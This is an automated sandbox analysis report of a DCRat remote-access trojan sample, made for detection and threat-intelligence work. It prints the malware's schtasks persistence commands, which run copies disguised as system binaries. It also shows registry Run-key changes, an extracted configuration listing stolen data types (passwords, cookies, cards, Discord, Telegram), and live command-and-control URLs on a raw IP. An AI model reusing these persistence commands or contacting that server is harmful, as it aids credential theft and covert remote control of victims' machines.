Edit tour

Windows Analysis Report
B9exXW7c3t.exe

Overview

General Information

Sample name:	B9exXW7c3t.exe renamed because original name is a hash value
Original sample name:	13aeda86aafde4051d7ca9280dac9a67.exe
Analysis ID:	1430334
MD5:	13aeda86aafde4051d7ca9280dac9a67
SHA1:	fd4a6168c79c28d6e25be7c799ffd25c2dbd69d0
SHA256:	01ef75f76ae452476b1de15a3238617f33c4b685e5bb423de49f34f44b0a0111
Tags:	DCRatexe
Infos:

Detection

DCRat

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Schedule system process

Yara detected DCRat

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

C2 URLs / IPs found in malware configuration

Creates an autostart registry key pointing to binary in C:\Windows

Creates an undocumented autostart registry key

Creates autostart registry keys with suspicious values (likely registry only malware)

Creates multiple autostart registry keys

Creates processes via WMI

Drops executables to the windows directory (C:\Windows) and starts them

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Execution from Suspicious Folder

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Suspicious Program Location with Network Connections

Sigma detected: System File Execution Location Anomaly

Uses schtasks.exe or at.exe to add and modify task schedules

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: CurrentVersion NT Autorun Keys Modification

Sigma detected: Suspicious Powershell In Registry Run Keys

Sigma detected: Suspicious Schtasks From Env Var Folder

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

B9exXW7c3t.exe (PID: 5880 cmdline: "C:\Users\user\Desktop\B9exXW7c3t.exe" MD5: 13AEDA86AAFDE4051D7CA9280DAC9A67)

schtasks.exe (PID: 1196 cmdline: schtasks.exe /create /tn "QeWHGGzCXwoQygZUiDIQ" /sc MINUTE /mo 14 /tr "'C:\Program Files\Microsoft\OneDrive\ListSync\QeWHGGzCXwoQygZUiDI.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1084 cmdline: schtasks.exe /create /tn "QeWHGGzCXwoQygZUiDI" /sc ONLOGON /tr "'C:\Program Files\Microsoft\OneDrive\ListSync\QeWHGGzCXwoQygZUiDI.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 2952 cmdline: schtasks.exe /create /tn "QeWHGGzCXwoQygZUiDIQ" /sc MINUTE /mo 14 /tr "'C:\Program Files\Microsoft\OneDrive\ListSync\QeWHGGzCXwoQygZUiDI.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5708 cmdline: schtasks.exe /create /tn "QeWHGGzCXwoQygZUiDIQ" /sc MINUTE /mo 8 /tr "'C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 2892 cmdline: schtasks.exe /create /tn "QeWHGGzCXwoQygZUiDI" /sc ONLOGON /tr "'C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 2124 cmdline: schtasks.exe /create /tn "QeWHGGzCXwoQygZUiDIQ" /sc MINUTE /mo 13 /tr "'C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5628 cmdline: schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Mail\ctfmon.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5612 cmdline: schtasks.exe /create /tn "ctfmon" /sc ONLOGON /tr "'C:\Program Files\Windows Mail\ctfmon.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 428 cmdline: schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Mail\ctfmon.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1864 cmdline: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4320 cmdline: schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6340 cmdline: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 6 /tr "'C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3580 cmdline: schtasks.exe /create /tn "QeWHGGzCXwoQygZUiDIQ" /sc MINUTE /mo 5 /tr "'C:\Users\Default User\Saved Games\QeWHGGzCXwoQygZUiDI.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3664 cmdline: schtasks.exe /create /tn "QeWHGGzCXwoQygZUiDI" /sc ONLOGON /tr "'C:\Users\Default User\Saved Games\QeWHGGzCXwoQygZUiDI.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4372 cmdline: schtasks.exe /create /tn "QeWHGGzCXwoQygZUiDIQ" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\Saved Games\QeWHGGzCXwoQygZUiDI.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3624 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Users\Public\AccountPictures\RuntimeBroker.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4500 cmdline: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Public\AccountPictures\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3808 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Users\Public\AccountPictures\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5596 cmdline: schtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 14 /tr "'C:\Users\Default\Links\ApplicationFrameHost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5820 cmdline: schtasks.exe /create /tn "ApplicationFrameHost" /sc ONLOGON /tr "'C:\Users\Default\Links\ApplicationFrameHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1868 cmdline: schtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Links\ApplicationFrameHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3436 cmdline: schtasks.exe /create /tn "QeWHGGzCXwoQygZUiDIQ" /sc MINUTE /mo 6 /tr "'C:\Users\user\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 2428 cmdline: schtasks.exe /create /tn "QeWHGGzCXwoQygZUiDI" /sc ONLOGON /tr "'C:\Users\user\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6428 cmdline: schtasks.exe /create /tn "QeWHGGzCXwoQygZUiDIQ" /sc MINUTE /mo 6 /tr "'C:\Users\user\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

QeWHGGzCXwoQygZUiDI.exe (PID: 4124 cmdline: "C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe" MD5: 13AEDA86AAFDE4051D7CA9280DAC9A67)

ApplicationFrameHost.exe (PID: 3808 cmdline: C:\Users\Default\Links\ApplicationFrameHost.exe MD5: 13AEDA86AAFDE4051D7CA9280DAC9A67)

ApplicationFrameHost.exe (PID: 5612 cmdline: C:\Users\Default\Links\ApplicationFrameHost.exe MD5: 13AEDA86AAFDE4051D7CA9280DAC9A67)

ctfmon.exe (PID: 6304 cmdline: "C:\Program Files\Windows Mail\ctfmon.exe" MD5: 13AEDA86AAFDE4051D7CA9280DAC9A67)

ctfmon.exe (PID: 5644 cmdline: "C:\Program Files\Windows Mail\ctfmon.exe" MD5: 13AEDA86AAFDE4051D7CA9280DAC9A67)

QeWHGGzCXwoQygZUiDI.exe (PID: 2796 cmdline: "C:\Users\user\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe" MD5: 13AEDA86AAFDE4051D7CA9280DAC9A67)

QeWHGGzCXwoQygZUiDI.exe (PID: 1196 cmdline: "C:\Users\user\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe" MD5: 13AEDA86AAFDE4051D7CA9280DAC9A67)

RuntimeBroker.exe (PID: 1084 cmdline: C:\Users\Public\AccountPictures\RuntimeBroker.exe MD5: 13AEDA86AAFDE4051D7CA9280DAC9A67)

RuntimeBroker.exe (PID: 6648 cmdline: C:\Users\Public\AccountPictures\RuntimeBroker.exe MD5: 13AEDA86AAFDE4051D7CA9280DAC9A67)

winlogon.exe (PID: 7176 cmdline: "C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe" MD5: 13AEDA86AAFDE4051D7CA9280DAC9A67)

winlogon.exe (PID: 7208 cmdline: "C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe" MD5: 13AEDA86AAFDE4051D7CA9280DAC9A67)

QeWHGGzCXwoQygZUiDI.exe (PID: 7760 cmdline: "C:\Users\user\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe" MD5: 13AEDA86AAFDE4051D7CA9280DAC9A67)

ctfmon.exe (PID: 8060 cmdline: "C:\Program Files\Windows Mail\ctfmon.exe" MD5: 13AEDA86AAFDE4051D7CA9280DAC9A67)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"SCRT": "{\"e\":\"&\",\"d\":\",\",\"S\":\"-\",\"G\":\"~\",\"R\":\"<\",\"6\":\"%\",\"c\":\"^\",\"2\":\" \",\"A\":\")\",\"3\":\"$\",\"m\":\"#\",\"x\":\"(\",\"V\":\"`\",\"9\":\";\",\"5\":\"|\",\"v\":\"!\",\"I\":\"@\",\"N\":\".\",\"b\":\"_\",\"T\":\">\",\"J\":\"*\"}", "PCRT": "{\"2\":\"^\",\"Q\":\",\",\"F\":\"|\",\"I\":\"~\",\"d\":\")\",\"R\":\"_\",\"t\":\".\",\"m\":\"%\",\"W\":\"!\",\"U\":\"&\",\"Y\":\"@\",\"X\":\"*\",\"C\":\"`\",\"G\":\"$\",\"b\":\"#\",\"5\":\"(\",\"Z\":\"<\",\"x\":\"-\",\"1\":\" \",\"B\":\";\",\"N\":\">\"}", "TAG": "YBA", "MUTEX": "DCR_MUTEX-0SJnAuGLGjvH4UgcW6Na", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 2, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false, "H1": "http://82.146.61.164/localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/@=wWYj9GbwdHc0RHalJXdjV2U", "H2": "http://82.146.61.164/localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/@=wWYj9GbwdHc0RHalJXdjV2U", "T": "0"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000001E.00000002.2180837076.0000000002F3F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000020.00000002.2173207701.0000000002BDF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000001E.00000002.2180837076.0000000002F01000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000001B.00000002.2131167381.0000000002721000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000023.00000002.2189170513.0000000002F11000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000024.00000002.2186087124.0000000002551000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000000.00000002.2023417505.0000000002E81000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000000.00000002.2023417505.00000000031CB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000001B.00000002.2131167381.000000000275F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000023.00000002.2189170513.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000027.00000002.2295888940.0000000002E51000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000025.00000002.2233092169.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000021.00000002.2185833372.0000000002B6F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000025.00000002.2233092169.0000000002DEF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000001D.00000002.2185558862.00000000033E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000020.00000002.2173207701.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000021.00000002.2185833372.0000000002B31000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000001D.00000002.2185558862.000000000341F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000001A.00000002.2043423134.0000000002A61000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000001C.00000002.2080688928.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000024.00000002.2186087124.000000000258F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000027.00000002.2295888940.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000022.00000002.2189636764.00000000025A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000001F.00000002.2175740771.0000000003081000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000000.00000002.2025245210.0000000012E8D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: B9exXW7c3t.exe PID: 5880	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: QeWHGGzCXwoQygZUiDI.exe PID: 4124	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: ApplicationFrameHost.exe PID: 3808	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: ApplicationFrameHost.exe PID: 5612	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: ctfmon.exe PID: 6304	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: ctfmon.exe PID: 5644	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: QeWHGGzCXwoQygZUiDI.exe PID: 2796	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: QeWHGGzCXwoQygZUiDI.exe PID: 1196	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: RuntimeBroker.exe PID: 1084	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: RuntimeBroker.exe PID: 6648	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: winlogon.exe PID: 7176	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: winlogon.exe PID: 7208	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: QeWHGGzCXwoQygZUiDI.exe PID: 7760	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: ctfmon.exe PID: 8060	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 34 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
28.2.ApplicationFrameHost.exe.2b6eca8.3.raw.unpack	INDICATOR_SUSPICIOUS_References_SecTools_B64Encoded	Detects executables referencing many base64-encoded IR and analysis tools names	ditekSHen	0x164ec:$s4: cHJvY2V4cA 0x16e34:$s4: cHJvY2V4cA 0x1652d:$s5: cHJvY2V4cDY0 0x16e75:$s5: cHJvY2V4cDY0 0x16429:$s12: d2lyZXNoYXJr 0x16d71:$s12: d2lyZXNoYXJr 0x162d2:$s23: ZG5zcHk 0x16c1a:$s23: ZG5zcHk 0x162db:$s25: aWxzcHk 0x16c23:$s25: aWxzcHk 0x162e4:$s26: ZG90cGVla 0x16c2c:$s26: ZG90cGVla
26.2.QeWHGGzCXwoQygZUiDI.exe.2b7eff0.2.raw.unpack	INDICATOR_SUSPICIOUS_References_SecTools_B64Encoded	Detects executables referencing many base64-encoded IR and analysis tools names	ditekSHen	0x164ec:$s4: cHJvY2V4cA 0x16e34:$s4: cHJvY2V4cA 0x1652d:$s5: cHJvY2V4cDY0 0x16e75:$s5: cHJvY2V4cDY0 0x16429:$s12: d2lyZXNoYXJr 0x16d71:$s12: d2lyZXNoYXJr 0x162d2:$s23: ZG5zcHk 0x16c1a:$s23: ZG5zcHk 0x162db:$s25: aWxzcHk 0x16c23:$s25: aWxzcHk 0x162e4:$s26: ZG90cGVla 0x16c2c:$s26: ZG90cGVla
0.2.B9exXW7c3t.exe.2ee9680.10.raw.unpack	INDICATOR_SUSPICIOUS_References_SecTools_B64Encoded	Detects executables referencing many base64-encoded IR and analysis tools names	ditekSHen	0x164d4:$s4: cHJvY2V4cA 0x16e1c:$s4: cHJvY2V4cA 0x16515:$s5: cHJvY2V4cDY0 0x16e5d:$s5: cHJvY2V4cDY0 0x16411:$s12: d2lyZXNoYXJr 0x16d59:$s12: d2lyZXNoYXJr 0x162ba:$s23: ZG5zcHk 0x16c02:$s23: ZG5zcHk 0x162c3:$s25: aWxzcHk 0x16c0b:$s25: aWxzcHk 0x162cc:$s26: ZG90cGVla 0x16c14:$s26: ZG90cGVla

Sigma Signatures

System Summary

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Default\Links\ApplicationFrameHost.exe, CommandLine: C:\Users\Default\Links\ApplicationFrameHost.exe, CommandLine|base64offset|contains: , Image: C:\Users\Default\Links\ApplicationFrameHost.exe, NewProcessName: C:\Users\Default\Links\ApplicationFrameHost.exe, OriginalFileName: C:\Users\Default\Links\ApplicationFrameHost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\Default\Links\ApplicationFrameHost.exe, ProcessId: 3808, ProcessName: ApplicationFrameHost.exe

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\B9exXW7c3t.exe, ProcessId: 5880, TargetFilename: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: "C:\Users\Public\AccountPictures\RuntimeBroker.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\B9exXW7c3t.exe, ProcessId: 5880, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker

Sigma detected: Suspicious Program Location with Network Connections

Source: Network Connection

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 82.146.61.164, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Default\Links\ApplicationFrameHost.exe, Initiated: true, ProcessId: 5612, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49706

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Users\Public\AccountPictures\RuntimeBroker.exe, CommandLine: C:\Users\Public\AccountPictures\RuntimeBroker.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\AccountPictures\RuntimeBroker.exe, NewProcessName: C:\Users\Public\AccountPictures\RuntimeBroker.exe, OriginalFileName: C:\Users\Public\AccountPictures\RuntimeBroker.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\Public\AccountPictures\RuntimeBroker.exe, ProcessId: 1084, ProcessName: RuntimeBroker.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Program Files\Microsoft\OneDrive\ListSync\QeWHGGzCXwoQygZUiDI.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\B9exXW7c3t.exe, ProcessId: 5880, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\QeWHGGzCXwoQygZUiDI

Sigma detected: CurrentVersion NT Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Program Files\Microsoft\OneDrive\ListSync\QeWHGGzCXwoQygZUiDI.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\B9exXW7c3t.exe, ProcessId: 5880, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

Sigma detected: Suspicious Powershell In Registry Run Keys

Source: Registry Key set

Author: frack113, Florian Roth (Nextron Systems): Data: Details: "C:\Users\user\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\B9exXW7c3t.exe, ProcessId: 5880, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\QeWHGGzCXwoQygZUiDI

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Users\Public\AccountPictures\RuntimeBroker.exe'" /f, CommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Users\Public\AccountPictures\RuntimeBroker.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\B9exXW7c3t.exe", ParentImage: C:\Users\user\Desktop\B9exXW7c3t.exe, ParentProcessId: 5880, ParentProcessName: B9exXW7c3t.exe, ProcessCommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Users\Public\AccountPictures\RuntimeBroker.exe'" /f, ProcessId: 3624, ProcessName: schtasks.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe", CommandLine: "C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe", CommandLine|base64offset|contains: , Image: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe, NewProcessName: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe, OriginalFileName: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: "C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe", ProcessId: 7176, ProcessName: winlogon.exe

Persistence and Installation Behavior

Sigma detected: Schedule system process

Source: Process started

Author: Joe Security: Data: Command: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe'" /f, CommandLine: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\B9exXW7c3t.exe", ParentImage: C:\Users\user\Desktop\B9exXW7c3t.exe, ParentProcessId: 5880, ParentProcessName: B9exXW7c3t.exe, ProcessCommandLine: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe'" /f, ProcessId: 1864, ProcessName: schtasks.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: B9exXW7c3t.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://82.146.61.164/localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?ZVSxTWRKIX4WAKi9eeqlLhfkTFe6=YMPLZX6E9wpNIWg&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&ZVSxTWRKIX4WAKi9eeqlLhfkTFe6=YMPLZX6E9wpNIWg	Avira URL Cloud: Label: malware
Source: http://82.146.61.164/localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?md25=UA&vb=r948xSj667Ud7PLnWmgd&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&md25=UA&vb=r948xSj667Ud7PLnWmgd	Avira URL Cloud: Label: malware
Source: http://82.146.61.164/localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/@=wWYj9GbwdHc0RHalJXdjV2U	Avira URL Cloud: Label: malware
